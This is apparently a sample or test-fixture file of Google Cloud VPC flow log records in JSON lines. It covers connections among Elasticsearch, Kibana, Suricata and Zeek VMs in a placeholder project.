+{"insertId":"bxuq05fhgmw9e","jsonPayload":{"bytes_sent":"155675","connection":{"dest_ip":"192.168.2.177","dest_port":60126,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"suricata-iowa","zone":"us-central1-a"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:52.101129310Z","packets_sent":"288","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:02.019841536Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} 
+{"insertId":"bxuq05fhgmw98","jsonPayload":{"bytes_sent":"1791","connection":{"dest_ip":"67.43.156.13","dest_port":32882,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:44:07.811355936Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:44:07.689331553Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"}
+{"insertId":"bxuq05fhgmw96","jsonPayload":{"bytes_sent":"28304484","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":39568},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:02.085146013Z","packets_sent":"2400","reporter":"DEST","rtt_msec":"15","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:40:00.480787267Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"}
+{"insertId":"bxuq05fhgmw99","jsonPayload":{"bytes_sent":"2962242","connection":{"dest_ip":"67.43.156.13","dest_port":39568,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:49:02.085146013Z","packets_sent":"1340","reporter":"SRC","rtt_msec":"15","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.480787267Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"}
+{"insertId":"bxuq05fhgmw93","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"192.168.2.117","dest_port":58026,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:49:09.114674887Z","packets_sent":"7","reporter":"SRC","rtt_msec":"40","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:49:08.995009558Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"}
+{"insertId":"bxuq05fhgmw9f","jsonPayload":{"bytes_sent":"9611","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33874},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.933323342Z","packets_sent":"101","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.510575555Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} 
+{"insertId":"bxuq05fhgmw9j","jsonPayload":{"bytes_sent":"318481","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33564},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.597223164Z","packets_sent":"181","reporter":"SRC","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.866699945Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} 
+{"insertId":"bxuq05fhgmw97","jsonPayload":{"bytes_sent":"139359","connection":{"dest_ip":"10.87.40.76","dest_port":33874,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.933323342Z","packets_sent":"70","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.510575555Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} 
+{"insertId":"bxuq05fhgmw9i","jsonPayload":{"bytes_sent":"1461","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.13","src_port":60640},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:42:50.942543211Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:42:50.830164366Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"}
+{"insertId":"bxuq05fhgmw9c","jsonPayload":{"bytes_sent":"45","connection":{"dest_ip":"67.43.156.14","dest_port":41818,"protocol":6,"src_ip":"10.139.99.242","src_port":22},"dest_location":{"asn":4837,"city":"Shangqiu","continent":"Asia","country":"chn","region":"Henan"},"end_time":"2019-06-14T03:43:16.809366809Z","packets_sent":"9","reporter":"SRC","rtt_msec":"1350","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:11.031370298Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"}
+{"insertId":"bxuq05fhgmw9h","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"67.43.156.13","dest_port":60640,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:42:50.942543211Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:42:50.830164366Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"}
+{"insertId":"bxuq05fhgmw92","jsonPayload":{"bytes_sent":"358920","connection":{"dest_ip":"10.87.40.76","dest_port":33966,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821302149Z","packets_sent":"61","reporter":"DEST","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.510534141Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"t
ype":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"}
+{"insertId":"bxuq05fhgmw8u","jsonPayload":{"bytes_sent":"653827","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.14","src_port":53104},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:45.312543839Z","packets_sent":"286","reporter":"DEST","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"zeek-nsm","zone":"us-central1-a"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.188944581Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"}
+{"insertId":"bxuq05fhgmw9g","jsonPayload":{"bytes_sent":"5220","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33966},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821302149Z","packets_sent":"81","reporter":"SRC","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.510534141Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} 
+{"insertId":"bxuq05fhgmw91","jsonPayload":{"bytes_sent":"31140","connection":{"dest_ip":"10.87.40.76","dest_port":33524,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.461240929Z","packets_sent":"40","reporter":"DEST","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:24.789945697Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} 
+{"insertId":"bxuq05fhgmw95","jsonPayload":{"bytes_sent":"1610630","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"192.168.2.177","src_port":60126},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:52.101129310Z","packets_sent":"509","reporter":"DEST","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"suricata-iowa","zone":"us-central1-a"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:02.019841536Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} 
+{"insertId":"bxuq05fhgmw9a","jsonPayload":{"bytes_sent":"37145","connection":{"dest_ip":"67.43.156.14","dest_port":53104,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"zeek-nsm","zone":"us-central1-a"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:45.312543839Z","packets_sent":"158","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.188944581Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} 
+{"insertId":"198begsfh44xy3","jsonPayload":{"bytes_sent":"1460","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.13","src_port":53972},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:44:20.748121914Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:44:20.634231041Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"}
+{"insertId":"198begsfh44xxt","jsonPayload":{"bytes_sent":"1458","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"192.168.2.117","src_port":58100},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:20.632737426Z","packets_sent":"7","reporter":"DEST","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:49:20.512264850Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"}
+{"insertId":"198begsfh44xy8","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"192.168.2.117","dest_port":58100,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:49:20.632777660Z","packets_sent":"7","reporter":"SRC","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:49:20.512407536Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"}
+{"insertId":"198begsfh44xy9","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"67.43.156.14","dest_port":60756,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:43:11.032929292Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:43:10.912193869Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"}
+{"insertId":"198begsfh44xxr","jsonPayload":{"bytes_sent":"0","connection":{"dest_ip":"10.139.99.242","dest_port":22,"protocol":6,"src_ip":"67.43.156.14","src_port":14236},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:40:12.064908439Z","packets_sent":"3","reporter":"DEST","src_location":{"asn":4837,"city":"Shangqiu","continent":"Asia","country":"chn","region":"Henan"},"start_time":"2019-06-14T03:40:08.247072525Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"}
+{"insertId":"198begsfh44xy2","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"67.43.156.13","dest_port":60122,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:41:39.207635184Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:41:39.087226326Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"}
+{"insertId":"198begsfh44xy6","jsonPayload":{"bytes_sent":"1782","connection":{"dest_ip":"67.43.156.13","dest_port":53972,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:44:20.748121914Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:44:20.634231041Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} +{"insertId":"198begsfh44xxx","jsonPayload":{"bytes_sent":"68545","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33530},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:52.205089801Z","packets_sent":"368","reporter":"DEST","rtt_msec":"163","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.140301693Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwor
k_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} +{"insertId":"198begsfh44xy4","jsonPayload":{"bytes_sent":"74613","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":65274},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220838853Z","packets_sent":"745","reporter":"DEST","rtt_msec":"209","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:01.270996793Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} 
+{"insertId":"198begsfh44xy1","jsonPayload":{"bytes_sent":"74942","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":53879},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.312105537Z","packets_sent":"726","reporter":"DEST","rtt_msec":"176","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:00.760414869Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} +{"insertId":"198begsfh44xxp","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.13","src_port":34450},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:47:38.299054333Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:47:38.189569840Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} 
+{"insertId":"198begsfh44xxv","jsonPayload":{"bytes_sent":"121593","connection":{"dest_ip":"67.43.156.13","dest_port":65274,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220838853Z","packets_sent":"610","reporter":"SRC","rtt_msec":"209","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.270996793Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} 